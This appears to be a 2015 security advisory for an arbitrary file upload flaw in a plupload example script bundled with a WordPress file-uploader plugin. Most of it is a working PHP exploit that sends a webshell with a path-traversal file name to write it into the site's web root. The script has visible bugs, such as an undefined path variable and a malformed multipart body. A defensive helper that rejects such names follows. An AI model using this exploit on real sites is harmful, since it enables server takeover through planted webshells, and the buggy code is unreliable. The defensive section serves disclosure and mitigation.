PLUPLOAD EXAMPLE FILE ARBITRARY FILE UPLOAD

Posted on 09/03/2015 20:56
Multiple plugin vulnerabilities

A file named upload.php in an example directory of the plupload-2.1.2 PHP library allows an attacker to upload an arbitrary file to the server that hosts the PHP application. It writes to the ini_get("upload_tmp_dir") directory, but with path characters like "../../.." in combination with a PHP error, we can write to a web path, or replace a file with the web server's rights.

Exploit:

 
 /********************************
 
 Author: Adrien Thierry
 Website : http://seraum.com
disclosure : http://openbreach.com/index/OB-2015-0003
vendor : alerted

 Exploit for NMEDIA USER FILE UPLOADER 3.7, web root can be found with php error by accessing /nmedia-user-file-uploader/index.php

 
 ********************************/
/* EXPLOIT URL  */
$target_url= "http://thewpsite.something/wp-content/plugins/";
$plugin_path = "nmedia-user-file-uploader/js/plupload-2.1.2/examples/";
/* TARGET UPLOAD FILE */
$target_file = "upload.php";
/* FILE TO UPLOAD */
$file = "webshell.php";
/* NAME */
$name = "../../../../../../../../var/www/thesite/www/file.php";
 
/* LAUNCHING EXPLOIT */
do_post_request($target_url . $module_path . $target_file . "?name=" . $name, $target_url, $file, $name);
 
function do_post_request($url, $res, $file, $name)
{
    $data = "";
    $boundary = "---------------------".substr(md5(rand(0,32000)), 0, 10);
    $data .= "--$boundary\n";
    $fileContents = file_get_contents($file);
    $md5 = md5_file($file);
    $ext = pathinfo($file, PATHINFO_EXTENSION);
    $data .= "Content-Disposition: form-data; name=\"file\"; filename=\"file.php\"\n";
    $data .= "Content-Type: text/plain\n";
    $data .= "Content-Transfer-Encoding: binary\n\n";
    $data .= $fileContents."\n";
    $data .= "--$boundary--\n";
    
    $data .= "Content-Disposition: form-data; name=\"vfb-submit\"\n";
    $data .= " ok ";
    $data .= $fileContents."\n";
    
    $params = array('http' => array(
    'method' => 'POST',
    'header' => 'Content-Type: multipart/form-data; boundary='.$boundary,
    'content' => $data
    ));
 echo " URL : " . $url;
$ctx = stream_context_create($params);
    $fp = fopen($url, 'rb', false, $ctx);
    if (!$fp)
    {
       throw new Exception("Erreur !");
    }
    $response = @stream_get_contents($fp);
    if ($response === false)
    {
       throw new Exception("Erreur !");
    }
    else
    {
        echo "file successfully uploaded here : PHP_INI_GET_UPLOAD/" . $name;
    }
}
 
?>
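One way an upload handler can keep a client-supplied "name" inside its upload directory, shown as an added example that is not code from plupload, the plugin or the advisory's author. The function name resolve_upload_path, the extension allowlist and the sample names are assumptions made for illustration.

```php
<?php
// Added example: hypothetical helper, not code from plupload or the plugin.
// It maps the client-supplied "name" parameter to a path that cannot leave
// the upload directory and cannot end up executable by the web server.

function resolve_upload_path(string $baseDir, string $clientName, array $allowedExt): ?string
{
    $base = realpath($baseDir);
    if ($base === false || !is_dir($base)) {
        return null;                       // upload directory must already exist
    }
    // Reject anything that is not a plain file name: separators, NUL, "..".
    if ($clientName === '' || strpbrk($clientName, "/\\\0") !== false
        || strpos($clientName, '..') !== false) {
        return null;
    }
    // Strict character allowlist, no leading dot (.htaccess, .user.ini).
    if (!preg_match('/\A[A-Za-z0-9][A-Za-z0-9._-]{0,99}\z/', $clientName)) {
        return null;
    }
    // Every dot-separated suffix must be allowed, so "x.php.jpg" is refused too.
    $parts = explode('.', strtolower($clientName));
    array_shift($parts);                   // drop the stem, keep the suffixes
    if ($parts === [] || array_diff($parts, $allowedExt) !== []) {
        return null;
    }
    // Store under a server-generated name; the client name is only validated.
    $target = $base . DIRECTORY_SEPARATOR . bin2hex(random_bytes(16)) . '.' . end($parts);
    // Defence in depth: the final path must sit directly in the base directory.
    return dirname($target) === $base ? $target : null;
}

// Constructed inputs, including the "name" value used in the exploit above.
$dir = sys_get_temp_dir();
$samples = [
    '../../../../../../../../var/www/thesite/www/file.php',
    'file.php',
    'report.php.jpg',
    '.htaccess',
    'holiday-photo.jpg',
];
foreach ($samples as $name) {
    $path = resolve_upload_path($dir, $name, ['jpg', 'png', 'pdf']);
    printf("%-55s => %s\n", $name, $path ?? 'REJECTED');
}
```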
